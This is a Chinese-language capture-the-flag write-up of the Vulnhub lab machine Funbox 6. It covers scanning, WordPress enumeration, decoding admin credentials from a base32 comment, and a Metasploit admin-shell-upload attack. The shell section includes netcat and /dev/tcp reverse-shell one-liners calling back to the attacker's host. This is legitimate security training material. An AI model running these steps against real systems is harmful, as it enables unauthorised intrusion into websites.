Funbox 6
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:6d:38 1 60 PCS Systemtechnik GmbH
192.168.56.160 08:00:27:e7:37:5d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.160
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 02:05 EST
Nmap scan report for localhost (192.168.56.160)
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0e:4f:3c:37:75:8a:a4:4d:bb:17:50:1b:ec:93:02:15 (RSA)
| 256 d7:dc:fc:b1:76:d6:76:13:da:ea:c4:30:04:bc:da:d2 (ECDSA)
|_ 256 51:19:47:a6:29:c8:22:10:c2:73:34:ad:de:7f:57:d3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox6.box/
MAC Address: 08:00:27:E7:37:5D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
浏览器访问80端口,打不开网站,而是指向funbox6.box,将其加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.160 funbox6.box
刷新页面,根据返回页面,知道是wordpress站点。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ nikto -h http://192.168.56.160
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.160
+ Target Hostname: 192.168.56.160
+ Target Port: 80
+ Start Time: 2023-01-09 02:10:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://funbox6.box/
+ Uncommon header 'link' found, with multiple values: (<http://funbox6.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox6.box/index.php/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json",<http://funbox6.box/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-01-09 02:11:20 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.160
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/09 02:11:45 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.160/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.160/wp-includes/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.160/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 220364 / 220561 (99.91%)
===============================================================
2023/01/09 02:12:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://192.168.56.160 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
Scan Aborted: The URL supplied redirects to http://funbox6.box/. Use the --ignore-main-redirect option to ignore the redirection and scan the target, or change the --url option value to the redirected URL.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://funbox6.box -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox6.box/ [192.168.56.160]
[+] Started: Mon Jan 9 02:14:32 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox6.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox6.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox6.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox6.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Rss Generator (Passive Detection)
| - http://funbox6.box/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
| - http://funbox6.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox6.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox6.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox6.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox6.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.4'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox6.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 9 02:14:42 2023
[+] Requests Done: 54
[+] Cached Requests: 7
[+] Data Sent: 13.281 KB
[+] Data Received: 512.118 KB
[+] Memory used: 239.348 MB
[+] Elapsed time: 00:00:10
看是否可以破解密码?
─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ wpscan --url http://funbox6.box -U admin -P /usr/share/wordlists/rockyou.txt
竟然没有破解出admin的密码,看来还是需要回过头去看网站本身有没有什么线索,
点开hello-world的帖子后,有个response,
admin
September 9, 2020 at 1:37 pm
flag{MFSG22LOHJTWC3LCNRSWQYLMNQ3TONY=}
解码后得到:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ echo 'MFSG22LOHJTWC3LCNRSWQYLMNQ3TONY=' | base32 -d
admin:gamblehall777
哈哈,原来奥秘在这里,然后登陆wordpress管理后台
但是竟然返回密码不对!!!可能是目标主机有防暴力破解措施,重启靶机以后,再次登陆,发现可以成功登录wordpress后台。
当尝试通过修改404模板的时候,update file报错:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
看来需要寻找的别方法获得shell
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.146
LHOST => 192.168.56.146
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.160
RHOSTS => 192.168.56.160
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD gamblehall777
PASSWORD => gamblehall777
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD gamblehall777 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.160 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.146 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox6.box
RHOSTS => funbox6.box
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:gamblehall777...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show advanced
Module advanced options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning
up files
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set
to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to exist
ing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset
to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS a
nd SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Macintosh; Intel no The User-Agent header to use for all requests
Mac OS X 12_2_1) AppleWebKit/6
05.1.15 (KHTML, like Gecko) Ve
rsion/15.2 Safari/605.1.15
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WPCHECK true yes Check if the website is a valid WordPress install
WPCONTENTDIR wp-content yes The name of the wp-content directory
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in second
s
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP
transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScrip
t)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.c
om/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpr
eter-Sessions
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires
tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will
NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should b
e killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut
down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableS
tageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compa
tible
StagerRetryCount 10 no The number of times the stager should retry if the first connect
fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attemp
ts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:gamblehall777...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: dda85bdb40
[*] Uploaded plugin jOYtyoFTQM
[*] Executing the payload at /wp-content/plugins/jOYtyoFTQM/gYuPdLwmQF.php...
[*] Sending stage (39927 bytes) to 192.168.56.160
[+] Deleted gYuPdLwmQF.php
[+] Deleted jOYtyoFTQM.php
[+] Deleted ../jOYtyoFTQM
[*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.160:57320) at 2023-01-09 02:50:42 -0500
meterpreter > shell
Process 2026 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo),100(users)
which nc
sh: 0: getcwd() failed: No such file or directory
/bin/nc
nc -e /bin/bash 192.168.56.146 6666
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
which python
sh: 0: getcwd() failed: No such file or directory
which python3
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python3
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
/bin/sh: 7: Syntax error: Bad fd number
meterpreter > shell
Process 2034 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
which python3
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python3
bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[*] 192.168.56.160 - Meterpreter session 1 closed. Reason: Died
meterpreter得到的shell似乎不稳定,赶紧spawn另外一个shell
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.160] 40758
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bash: cannot set terminal process group (2013): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
www-data@funbox6:$ exit
但很快这个shell的连接就断了
然后重新执行上述步骤,目标主机的IPS或者防火墙就不让登录,只能重启目标主机。
注意网站首页有个副标题,open 过一段时间变为closed,当closed的时候无法登录。
需要等待状态变为Open后继续工作,工作思路就是这样。
标签:shell,http,no,admin,192.168,Vulnhub,wp,Funbox,Gamble From: https://www.cnblogs.com/jason-huawen/p/17037410.html